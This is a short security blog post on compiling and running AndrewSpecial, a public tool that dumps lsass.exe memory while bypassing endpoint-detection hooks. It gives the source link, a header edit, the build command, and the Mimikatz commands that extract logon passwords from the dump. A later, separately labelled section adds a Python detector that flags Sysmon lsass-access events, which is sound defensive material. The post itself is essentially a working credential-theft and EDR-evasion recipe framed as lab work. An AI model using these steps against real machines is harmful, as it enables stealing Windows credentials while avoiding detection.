AndrewSpecial – stealthy lsass.exe memory dumping

Ultra short entry here. When reading a very interesting article on bypassing one endpoint security product to silently dump lsass.exe without getting detected, https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6 , one will of course want to reproduce the steps.

Since the code is available here:

https://github.com/hoangprod/AndrewSpecial/tree/master

I have just done that in my lab.

The notes below might save some seconds if one gets stuck compiling it. (I have used Visual Studio 2013 on Win7 SP1 64bit to build it.)

On the Windows build server, just download master.zip:
https://github.com/hoangprod/AndrewSpecial/archive/master.zip


Modify AndrewSpecial.h to include the additional #pragma comment (lib, "advapi32.lib"):

#include <Windows.h>
#include <stdio.h>
#include <winternl.h>
#include <Psapi.h>
#include <TlHelp32.h>
#include <DbgHelp.h>

#pragma comment (lib, "Dbghelp.lib")
#pragma comment (lib, "ntdll.lib")
#pragma comment (lib, "advapi32.lib")

void getversion_long();
bool AndrewSpecial(const wchar_t * ProcessName);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE, PVOID, PVOID, ULONG, PULONG);
typedef NTSTATUS(NTAPI* RtlGetVersion_t)(_Out_ PRTL_OSVERSIONINFOW lpVersionInformation);

enum supported_versions
{
    win8 = 0x060200,
    win81 = 0x060300,
    win10 = 0x0A0000,
};

Open up the VS2013 x64 Native Tools Command Prompt and cd to the source directory:

cl *.cpp /DUNICODE

Next we transfer the compiled Andrew.exe binary to our Windows 10 test lab box and execute it.

The resulting Andrew.dmp can be fed to a separate instance of Mimikatz on some other machine as follows:

mimikatz # sekurlsa::minidump Andrew.dmp
mimikatz # sekurlsa::logonPasswords

Courtesy of CaledoniaProject

https://github.com/hoangprod/AndrewSpecial/pull/1/commits/0320bf38ad02aa8b000b8095be35242b826d0f64
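As an added defender-side example (not code from the post or from the AndrewSpecial project): whichever way the dump reads lsass memory, hooked or unhooked NtReadVirtualMemory, the dumping process must first open a handle to lsass.exe with read access, and Sysmon logs that open as Event ID 10 (ProcessAccess). The script below parses constructed Sysmon-style records (the field names are Sysmon's; the images, access masks and allow-list are assumptions) and flags opens of lsass.exe that carry PROCESS_VM_READ from a non-allow-listed source image.

```python
# Added example, not part of the original post or the AndrewSpecial project:
# flag handle opens against lsass.exe that request memory-read access.
from typing import Optional
from dataclasses import dataclass

PROCESS_VM_READ = 0x0010  # access right any read of lsass memory needs

# Constructed Sysmon Event ID 10 records rendered as "key=value" lines
# (field names are Sysmon's; paths and masks are made up for this example).
SAMPLE_EVENTS = [
    "SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000",
    "SourceImage=C:\\Users\\lab\\Andrew.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1fffff",
    "SourceImage=C:\\Users\\lab\\tool.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "SourceImage=C:\\Users\\lab\\tool.exe TargetImage=C:\\Windows\\System32\\notepad.exe GrantedAccess=0x1fffff",
]

# Assumed allow-list of source images expected to touch lsass on this host.
ALLOWED_SOURCES = {"c:\\windows\\system32\\csrss.exe", "c:\\windows\\system32\\wininit.exe"}


@dataclass
class Alert:
    source: str
    granted: int


def parse_event(line: str) -> dict:
    """Split one constructed 'key=value key=value' record into a dict (no spaces in paths)."""
    fields = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def suspicious_lsass_access(line: str) -> Optional[Alert]:
    """Return an Alert when a non-allow-listed process opens lsass.exe with PROCESS_VM_READ."""
    ev = parse_event(line)
    target = ev.get("TargetImage", "").lower().rsplit("\\", 1)[-1]
    if target != "lsass.exe":
        return None
    granted = int(ev.get("GrantedAccess", "0"), 16)
    if not granted & PROCESS_VM_READ:
        return None
    if ev.get("SourceImage", "").lower() in ALLOWED_SOURCES:
        return None
    return Alert(source=ev["SourceImage"], granted=granted)


def scan(lines) -> list:
    """Run the check over a batch of records and keep only the hits."""
    return [a for a in (suspicious_lsass_access(l) for l in lines) if a]
```

A full-access mask such as 0x1fffff and the minimal 0x1010 (VM_READ plus QUERY_INFORMATION) both trip the check; the 0x1000 query-only open from svchost.exe does not.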

About astr0baby
